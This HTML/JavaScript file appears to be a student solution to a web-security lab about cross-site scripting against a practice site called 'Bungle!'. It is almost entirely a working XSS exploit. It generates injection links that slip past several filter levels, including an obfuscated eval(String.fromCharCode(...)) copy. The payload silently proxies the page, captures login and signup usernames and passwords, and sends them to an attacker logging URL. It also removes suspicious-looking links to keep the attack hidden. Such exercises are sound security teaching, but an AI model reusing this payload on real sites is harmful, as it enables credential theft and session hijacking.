xss_payload_aw2.html

<meta charset="utf-8">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script>

// Extend this function:
function payload(attacker) {
	function log(data) {
		console.log($.param(data))
		$.get(attacker, data);
	}
	// AW: helper function for the login form submission and account creation
	// param: the_event - type=string; either "login" or "create"
	function post_helper(the_event){
		console.log("calling post_helper");
		var uname = document.getElementById("username").value;
		var pword = document.getElementById("userpass").value;
		$.post("http://permalink.co/" + the_event, {username: uname, password: pword}, function(){
			log({event: the_event, user: uname, pass: pword});
			proxy("http://permalink.co/");
		});
	}
	function back_helper(href){
		hist_stack.push(href);
		uid++;
		window.history.pushState({UID: uid},"",href);
	}
	var hist_stack = new Array();
	var fwd_stack = new Array();
	var uid = 0;
	var this_uid;
	//var prev_uid;
	function proxy(href) {
				
			//history.replaceState(window.history.state, "", href);
			if(window.history.state == null)
				history.replaceState({UID: uid},"",href);
			else
				history.replaceState(window.history.state, "", href);
			
			this_uid = window.history.state.UID;
			console.log("this_uid: " + this_uid);
			console.log("hist_stack: ", hist_stack);
			console.log("fwd_stack: ", fwd_stack);

		$("html").load(href, function(){
			$("html").show();

			var uname_elem = document.getElementById("logged-in-user");
			var user_name;
			if(uname_elem != null){
				user_name = uname_elem.innerHTML;
			}
			else{
				user_name = null;
			}

			//console.log("user_name: " + user_name);
			log({event: "nav", user: user_name, uri: href});
			$("#query").val("pwned!");

			// if we're on a search page, iterate through history
			if(href.search("search?") != -1){
				$('a').each(function(){
					//console.log("checking link: ", $(this).attr("href"));
					if($(this).attr("href").indexOf("%3C") >= 0){

						// remove malicious-looking stuff
						$(this).remove();
						//console.log("remove called");
					}

					// persist attack if they click on history links
					$(this).click("submit", function(event) {
						usersSearch = $(this).attr('href');
						//log("#logged-in-user");
						event.preventDefault();
						proxy("http://permalink.co/" + usersSearch);
					});

				});
			}

			window.onpopstate = function(e){
				var next_uid = e.state.UID;
				var top;
				console.log("popstate detected");
				console.log("next_uid: " + next_uid);
				
				console.log(e);
				if(next_uid < this_uid){
					console.log("***************back button*******************");
					top = hist_stack.pop();
					fwd_stack.push(href);
					proxy(top);
				}
				else {
					console.log("****************forward button******************");
					top = fwd_stack.pop();
					hist_stack.push(href);
					proxy(top);
				}

			};
			

			// Bungle! link
			$('#bungle-lnk').on("click", function(event) {
				event.preventDefault();
				back_helper(href);
				proxy("http://permalink.co/");
				//alert("Bungle_link_alert");
			});	

			// Search
			$('form[action="./search"]').on("submit", function(event) {
				usersSearch = document.getElementById('query').value;
				event.preventDefault();
				back_helper(href);
				var target_link = "http://permalink.co/search?q=" + usersSearch;
				proxy(target_link);
			});

			// Search again
			$('#search-again-btn').on("click", function(event) {
				event.preventDefault();
				back_helper(href);
				proxy("http://permalink.co/");
				//alert("Search_Again_button_alert");
			});

			// login
			$('form[action="./login"]').on("submit", function(event) {
				event.preventDefault();
				post_helper("login");
				//alert("login_form_alert");

			});

			// create account
			$('#new-account-btn').on("click", function(event) {
				event.preventDefault();
				post_helper("create");
				//alert("create_account_alert");
			});


			// logout
			$('#log-out-btn').on("click", function(event) {
				event.preventDefault();
				var uname = document.getElementById("logged-in-user").innerHTML;
				//console.log("uname: " + uname);
				$.post("http://permalink.co/logout", function(){
					log({event: "logout", user: uname});
					proxy("http://permalink.co/");
				});
			});


		});

		
	}
	$("html").hide();
	proxy("./");
}


// make the url; the url embeds the function definition above by calling payload.toString()
function makeLink(xssdefense, target, attacker) {
	if (xssdefense == 0) {
		return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
			encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");</script" + ">");
	}
	else if(xssdefense == 1){
		return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
			encodeURIComponent("<sscriptcript" + ">" + payload.toString() + ";payload(\"" + attacker + "\");</sscriptcript" + ">");
	}
	else if(xssdefense == 2){
		return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
			encodeURIComponent("<sscriptcript" + ">" + payload.toString() + ";payload(\"" + attacker + "\");</sscriptcript" + ">");
	}
	else if(xssdefense == 3){
		return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
			encodeURIComponent("<script" + ">" + "eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,112,97,121,108,111,97,100,40,97,116,116,97,99,107,101,114,41,32,123,10,9,102,117,110,99,116,105,111,110,32,108,111,103,40,100,97,116,97,41,32,123,10,9,9,99,111,110,115,111,108,101,46,108,111,103,40,36,46,112,97,114,97,109,40,100,97,116,97,41,41,10,9,9,36,46,103,101,116,40,97,116,116,97,99,107,101,114,44,32,100,97,116,97,41,59,10,9,125,10,9,47,47,32,65,87,58,32,104,101,108,112,101,114,32,102,117,110,99,116,105,111,110,32,102,111,114,32,116,104,101,32,108,111,103,105,110,32,102,111,114,109,32,115,117,98,109,105,115,115,105,111,110,32,97,110,100,32,97,99,99,111,117,110,116,32,99,114,101,97,116,105,111,110,10,9,47,47,32,112,97,114,97,109,58,32,116,104,101,95,101,118,101,110,116,32,45,32,116,121,112,101,61,115,116,114,105,110,103,59,32,101,105,116,104,101,114,32,34,108,111,103,105,110,34,32,111,114,32,34,99,114,101,97,116,101,34,10,9,102,117,110,99,116,105,111,110,32,112,111,115,116,95,104,101,108,112,101,114,40,116,104,101,95,101,118,101,110,116,41,123,10,9,9,99,111,110,115,111,108,101,46,108,111,103,40,34,99,97,108,108,105,110,103,32,112,111,115,116,95,104,101,108,112,101,114,34,41,59,10,9,9,118,97,114,32,117,110,97,109,101,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,117,115,101,114,110,97,109,101,34,41,46,118,97,108,117,101,59,10,9,9,118,97,114,32,112,119,111,114,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,117,115,101,114,112,97,115,115,34,41,46,118,97,108,117,101,59,10,9,9,36,46,112,111,115,116,40,34,104,116,116,112,58,47,47,112,101,114,109,97,108,105,110,107,46,99,111,47,34,32,43,32,116,104,101,95,101,118,101,110,116,44,32,123,117,115,101,114,110,97,109,101,58,32,117,110,97,109,101,44,32,112,97,115,115,119,111,114,100,58,32,112,119,111,114,100,125,44,32,102,117,110,99,116,105,111,110,40,41,123,10,9,9,9,108,111,103,40,123,101,118,101,110,116,58,32,116,104,101,95,101,118,101,110,116,44,32,117,115,101,114,58,32,117,110,97,109,101,44,32,112,97,115,115,58,32,112,119,111,114,100,125,41,59,10,9,9,9,112,114,111,120,121,40,34,104,116,116,112,58,47,47,112,101,114,109,97,108,105,110,107,46,99,111,47,34,41,59,10,9,9,125,41,59,10,9,125,10,9,102,117,110,99,116,105,111,110,32,98,97,99,107,95,104,101,108,112,101,114,40,104,114,101,102,41,123,10,9,9,104,105,115,116,95,115,116,97,99,107,46,112,117,115,104,40,104,114,101,102,41,59,10,9,9,117,105,100,43,43,59,10,9,9,119,105,110,100,111,119,46,104,105,115,116,111,114,121,46,112,117,115,104,83,116,97,116,101,40,123,85,73,68,58,32,117,105,100,125,44,34,34,44,104,114,101,102,41,59,10,9,125,10,9,118,97,114,32,104,105,115,116,95,115,116,97,99,107,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,10,9,118,97,114,32,102,119,100,95,115,116,97,99,107,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,10,9,118,97,114,32,117,105,100,32,61,32,48,59,10,9,118,97,114,32,116,104,105,115,95,117,105,100,59,10,9,47,47,118,97,114,32,112,114,101,118,95,117,105,100,59,10,9,102,117,110,99,116,105,111,110,32,112,114,111,120,121,40,104,114,101,102,41,32,123,10,9,9,9,9,10,9,9,9,47,47,104,105,115,116,111,114,121,46,114,101,112,108,97,99,101,83,116,97,116,101,40,119,105,110,100,111,119,46,104,105,115,116,111,114,121,46,115,116,97,116,101,44,32,34,34,44,32,104,114,101,102,41,59,10,9,9,9,105,102,40,119,105,110,100,111,119,46,104,105,115,116,111,114,121,46,115,116,97,116,101,32,61,61,32,110,117,108,108,41,10,9,9,9,9,104,105,115,116,111,114,121,46,114,101,112,108,97,99,101,83,116,97,116,101,40,123,85,73,68,58,32,117,105,100,125,44,34,34,44,104,114,101,102,41,59,10,9,9,9,101,108,115,101,10,9,9,9,9,104,105,115,116,111,114,121,46,114,101,112,108,97,99,101,83,116,97,116,101,40,119,105,110,100,111,119,46,104,105,115,116,111,114,121,46,115,116,97,116,101,44,32,34,34,44,32,104,114,101,102,41,59,10,9,9,9,10,9,9,9,116,104,105,115,95,117,105,100,32,61,32,119,105,110,100,111,119,46,104,105,115,116,111,114,121,46,115,116,97,116,101,46,85,73,68,59,10,9,9,9,99,111,110,115,111,108,101,46,108,111,103,40,34,116,104,105,115,95,117,105,100,58,32,34,32,43,32,116,104,105,115,95,117,105,100,41,59,10,9,9,9,99,111,110,115,111,108,101,46,108,111,103,40,34,104,105,115,116,95,115,116,97,99,107,58,32,34,44,32,104,105,115,116,95,115,116,97,99,107,41,59,10,9,9,9,99,111,110,115,111,108,101,46,108,111,103,40,34,102,119,100,95,115,116,97,99,107,58,32,34,44,32,102,119,100,95,115,116,97,99,107,41,59,10,10,9,9,36,40,34,104,116,109,108,34,41,46,108,111,97,100,40,104,114,101,102,44,32,102,117,110,99,116,105,111,110,40,41,123,10,9,9,9,36,40,34,104,116,109,108,34,41,46,115,104,111,119,40,41,59,10,10,9,9,9,118,97,114,32,117,110,97,109,101,95,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,103,101,100,45,105,110,45,117,115,101,114,34,41,59,10,9,9,9,118,97,114,32,117,115,101,114,95,110,97,109,101,59,10,9,9,9,105,102,40,117,110,97,109,101,95,101,108,101,109,32,33,61,32,110,117,108,108,41,123,10,9,9,9,9,117,115,101,114,95,110,97,109,101,32,61,32,117,110,97,109,101,95,101,108,101,109,46,105,110,110,101,114,72,84,77,76,59,10,9,9,9,125,10,9,9,9,101,108,115,101,123,10,9,9,9,9,117,115,101,114,95,110,97,109,101,32,61,32,110,117,108,108,59,10,9,9,9,125,10,10,9,9,9,47,47,99,111,110,115,111,108,101,46,108,111,103,40,34,117,115,101,114,95,110,97,109,101,58,32,34,32,43,32,117,115,101,114,95,110,97,109,101,41,59,10,9,9,9,108,111,103,40,123,101,118,101,110,116,58,32,34,110,97,118,34,44,32,117,115,101,114,58,32,117,115,101,114,95,110,97,109,101,44,32,117,114,105,58,32,104,114,101,102,125,41,59,10,9,9,9,36,40,34,35,113,117,101,114,121,34,41,46,118,97,108,40,34,112,119,110,101,100,33,34,41,59,10,10,9,9,9,47,47,32,105,102,32,119,101,39,114,101,32,111,110,32,97,32,115,101,97,114,99,104,32,112,97,103,101,44,32,105,116,101,114,97,116,101,32,116,104,114,111,117,103,104,32,104,105,115,116,111,114,121,10,9,9,9,105,102,40,104,114,101,102,46,115,101,97,114,99,104,40,34,115,101,97,114,99,104,63,34,41,32,33,61,32,45,49,41,123,10,9,9,9,9,36,40,39,97,39,41,46,101,97,99,104,40,102,117,110,99,116,105,111,110,40,41,123,10,9,9,9,9,9,47,47,99,111,110,115,111,108,101,46,108,111,103,40,34,99,104,101,99,107,105,110,103,32,108,105,110,107,58,32,34,44,32,36,40,116,104,105,115,41,46,97,116,116,114,40,34,104,114,101,102,34,41,41,59,10,9,9,9,9,9,105,102,40,36,40,116,104,105,115,41,46,97,116,116,114,40,34,104,114,101,102,34,41,46,105,110,100,101,120,79,102,40,34,37,51,67,34,41,32,62,61,32,48,41,123,10,10,9,9,9,9,9,9,47,47,32,114,101,109,111,118,101,32,109,97,108,105,99,105,111,117,115,45,108,111,111,107,105,110,103,32,115,116,117,102,102,10,9,9,9,9,9,9,36,40,116,104,105,115,41,46,114,101,109,111,118,101,40,41,59,10,9,9,9,9,9,9,47,47,99,111,110,115,111,108,101,46,108,111,103,40,34,114,101,109,111,118,101,32,99,97,108,108,101,100,34,41,59,10,9,9,9,9,9,125,10,10,9,9,9,9,9,47,47,32,112,101,114,115,105,115,116,32,97,116,116,97,99,107,32,105,102,32,116,104,101,121,32,99,108,105,99,107,32,111,110,32,104,105,115,116,111,114,121,32,108,105,110,107,115,10,9,9,9,9,9,36,40,116,104,105,115,41,46,99,108,105,99,107,40,34,115,117,98,109,105,116,34,44,32,102,117,110,99,116,105,111,110,40,101,118,101,110,116,41,32,123,10,9,9,9,9,9,9,117,115,101,114,115,83,101,97,114,99,104,32,61,32,36,40,116,104,105,115,41,46,97,116,116,114,40,39,104,114,101,102,39,41,59,10,9,9,9,9,9,9,47,47,108,111,103,40,34,35,108,111,103,103,101,100,45,105,110,45,117,115,101,114,34,41,59,10,9,9,9,9,9,9,101,118,101,110,116,46,112,114,101,118,101,110,116,68,101,102,97,117,108,116,40,41,59,10,9,9,9,9,9,9,112,114,111,120,121,40,34,104,116,116,112,58,47,47,112,101,114,109,97,108,105,110,107,46,99,111,47,34,32,43,32,117,115,101,114,115,83,101,97,114,99,104,41,59,10,9,9,9,9,9,125,41,59,10,10,9,9,9,9,125,41,59,10,9,9,9,125,10,10,9,9,9,119,105,110,100,111,119,46,111,110,112,111,112,115,116,97,116,101,32,61,32,102,117,110,99,116,105,111,110,40,101,41,123,10,9,9,9,9,118,97,114,32,110,101,120,116,95,117,105,100,32,61,32,101,46,115,116,97,116,101,46,85,73,68,59,10,9,9,9,9,118,97,114,32,116,111,112,59,10,9,9,9,9,99,111,110,115,111,108,101,46,108,111,103,40,34,112,111,112,115,116,97,116,101,32,100,101,116,101,99,116,101,100,34,41,59,10,9,9,9,9,99,111,110,115,111,108,101,46,108,111,103,40,34,110,101,120,116,95,117,105,100,58,32,34,32,43,32,110,101,120,116,95,117,105,100,41,59,10,9,9,9,9,10,9,9,9,9,99,111,110,115,111,108,101,46,108,111,103,40,101,41,59,10,9,9,9,9,105,102,40,110,101,120,116,95,117,105,100,32,60,32,116,104,105,115,95,117,105,100,41,123,10,9,9,9,9,9,99,111,110,115,111,108,101,46,108,111,103,40,34,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,98,97,99,107,32,98,117,116,116,111,110,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,34,41,59,10,9,9,9,9,9,116,111,112,32,61,32,104,105,115,116,95,115,116,97,99,107,46,112,111,112,40,41,59,10,9,9,9,9,9,102,119,100,95,115,116,97,99,107,46,112,117,115,104,40,104,114,101,102,41,59,10,9,9,9,9,9,112,114,111,120,121,40,116,111,112,41,59,10,9,9,9,9,125,10,9,9,9,9,101,108,115,101,32,123,10,9,9,9,9,9,99,111,110,115,111,108,101,46,108,111,103,40,34,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,102,111,114,119,97,114,100,32,98,117,116,116,111,110,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,42,34,41,59,10,9,9,9,9,9,116,111,112,32,61,32,102,119,100,95,115,116,97,99,107,46,112,111,112,40,41,59,10,9,9,9,9,9,104,105,115,116,95,115,116,97,99,107,46,112,117,115,104,40,104,114,101,102,41,59,10,9,9,9,9,9,112,114,111,120,121,40,116,111,112,41,59,10,9,9,9,9,125,10,10,9,9,9,125,59,10,9,9,9,10,10,9,9,9,47,47,32,66,117,110,103,108,101,33,32,108,105,110,107,10,9,9,9,36,40,39,35,98,117,110,103,108,101,45,108,110,107,39,41,46,111,110,40,34,99,108,105,99,107,34,44,32,102,117,110,99,116,105,111,110,40,101,118,101,110,116,41,32,123,10,9,9,9,9,101,118,101,110,116,46,112,114,101,118,101,110,116,68,101,102,97,117,108,116,40,41,59,10,9,9,9,9,98,97,99,107,95,104,101,108,112,101,114,40,104,114,101,102,41,59,10,9,9,9,9,112,114,111,120,121,40,34,104,116,116,112,58,47,47,112,101,114,109,97,108,105,110,107,46,99,111,47,34,41,59,10,9,9,9,9,47,47,97,108,101,114,116,40,34,66,117,110,103,108,101,95,108,105,110,107,95,97,108,101,114,116,34,41,59,10,9,9,9,125,41,59,9,10,10,9,9,9,47,47,32,83,101,97,114,99,104,10,9,9,9,36,40,39,102,111,114,109,91,97,99,116,105,111,110,61,34,46,47,115,101,97,114,99,104,34,93,39,41,46,111,110,40,34,115,117,98,109,105,116,34,44,32,102,117,110,99,116,105,111,110,40,101,118,101,110,116,41,32,123,10,9,9,9,9,117,115,101,114,115,83,101,97,114,99,104,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,113,117,101,114,121,39,41,46,118,97,108,117,101,59,10,9,9,9,9,101,118,101,110,116,46,112,114,101,118,101,110,116,68,101,102,97,117,108,116,40,41,59,10,9,9,9,9,98,97,99,107,95,104,101,108,112,101,114,40,104,114,101,102,41,59,10,9,9,9,9,118,97,114,32,116,97,114,103,101,116,95,108,105,110,107,32,61,32,34,104,116,116,112,58,47,47,112,101,114,109,97,108,105,110,107,46,99,111,47,115,101,97,114,99,104,63,113,61,34,32,43,32,117,115,101,114,115,83,101,97,114,99,104,59,10,9,9,9,9,112,114,111,120,121,40,116,97,114,103,101,116,95,108,105,110,107,41,59,10,9,9,9,125,41,59,10,10,9,9,9,47,47,32,83,101,97,114,99,104,32,97,103,97,105,110,10,9,9,9,36,40,39,35,115,101,97,114,99,104,45,97,103,97,105,110,45,98,116,110,39,41,46,111,110,40,34,99,108,105,99,107,34,44,32,102,117,110,99,116,105,111,110,40,101,118,101,110,116,41,32,123,10,9,9,9,9,101,118,101,110,116,46,112,114,101,118,101,110,116,68,101,102,97,117,108,116,40,41,59,10,9,9,9,9,98,97,99,107,95,104,101,108,112,101,114,40,104,114,101,102,41,59,10,9,9,9,9,112,114,111,120,121,40,34,104,116,116,112,58,47,47,112,101,114,109,97,108,105,110,107,46,99,111,47,34,41,59,10,9,9,9,9,47,47,97,108,101,114,116,40,34,83,101,97,114,99,104,95,65,103,97,105,110,95,98,117,116,116,111,110,95,97,108,101,114,116,34,41,59,10,9,9,9,125,41,59,10,10,9,9,9,47,47,32,108,111,103,105,110,10,9,9,9,36,40,39,102,111,114,109,91,97,99,116,105,111,110,61,34,46,47,108,111,103,105,110,34,93,39,41,46,111,110,40,34,115,117,98,109,105,116,34,44,32,102,117,110,99,116,105,111,110,40,101,118,101,110,116,41,32,123,10,9,9,9,9,101,118,101,110,116,46,112,114,101,118,101,110,116,68,101,102,97,117,108,116,40,41,59,10,9,9,9,9,112,111,115,116,95,104,101,108,112,101,114,40,34,108,111,103,105,110,34,41,59,10,9,9,9,9,47,47,97,108,101,114,116,40,34,108,111,103,105,110,95,102,111,114,109,95,97,108,101,114,116,34,41,59,10,10,9,9,9,125,41,59,10,10,9,9,9,47,47,32,99,114,101,97,116,101,32,97,99,99,111,117,110,116,10,9,9,9,36,40,39,35,110,101,119,45,97,99,99,111,117,110,116,45,98,116,110,39,41,46,111,110,40,34,99,108,105,99,107,34,44,32,102,117,110,99,116,105,111,110,40,101,118,101,110,116,41,32,123,10,9,9,9,9,101,118,101,110,116,46,112,114,101,118,101,110,116,68,101,102,97,117,108,116,40,41,59,10,9,9,9,9,112,111,115,116,95,104,101,108,112,101,114,40,34,99,114,101,97,116,101,34,41,59,10,9,9,9,9,47,47,97,108,101,114,116,40,34,99,114,101,97,116,101,95,97,99,99,111,117,110,116,95,97,108,101,114,116,34,41,59,10,9,9,9,125,41,59,10,10,10,9,9,9,47,47,32,108,111,103,111,117,116,10,9,9,9,36,40,39,35,108,111,103,45,111,117,116,45,98,116,110,39,41,46,111,110,40,34,99,108,105,99,107,34,44,32,102,117,110,99,116,105,111,110,40,101,118,101,110,116,41,32,123,10,9,9,9,9,101,118,101,110,116,46,112,114,101,118,101,110,116,68,101,102,97,117,108,116,40,41,59,10,9,9,9,9,118,97,114,32,117,110,97,109,101,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,103,101,100,45,105,110,45,117,115,101,114,34,41,46,105,110,110,101,114,72,84,77,76,59,10,9,9,9,9,47,47,99,111,110,115,111,108,101,46,108,111,103,40,34,117,110,97,109,101,58,32,34,32,43,32,117,110,97,109,101,41,59,10,9,9,9,9,36,46,112,111,115,116,40,34,104,116,116,112,58,47,47,112,101,114,109,97,108,105,110,107,46,99,111,47,108,111,103,111,117,116,34,44,32,102,117,110,99,116,105,111,110,40,41,123,10,9,9,9,9,9,108,111,103,40,123,101,118,101,110,116,58,32,34,108,111,103,111,117,116,34,44,32,117,115,101,114,58,32,117,110,97,109,101,125,41,59,10,9,9,9,9,9,112,114,111,120,121,40,34,104,116,116,112,58,47,47,112,101,114,109,97,108,105,110,107,46,99,111,47,34,41,59,10,9,9,9,9,125,41,59,10,9,9,9,125,41,59,10,10,10,9,9,125,41,59,10,10,9,9,10,9,125,10,9,36,40,34,104,116,109,108,34,41,46,104,105,100,101,40,41,59,10,9,112,114,111,120,121,40,34,46,47,34,41,59,10,125,59,112,97,121,108,111,97,100,40,34,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,58,51,49,51,51,55,47,115,116,111,108,101,110,34,41,59))" + "</script" + ">");
			
	}
	else if(xssdefense == 4){
		
	}
}

var xssdefense = 4;
var target = "http://permalink.co/";
var attacker = "http://127.0.0.1:31337/stolen";
var script_uni = "";
var script_to_pass = script_uni.replace(/;&#/g,",")


// This part makes the <a></a> html code for the Try Bungle link
$(function() {
	var url = makeLink(xssdefense, target, attacker);
	$("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
});

</script>
<h3></h3>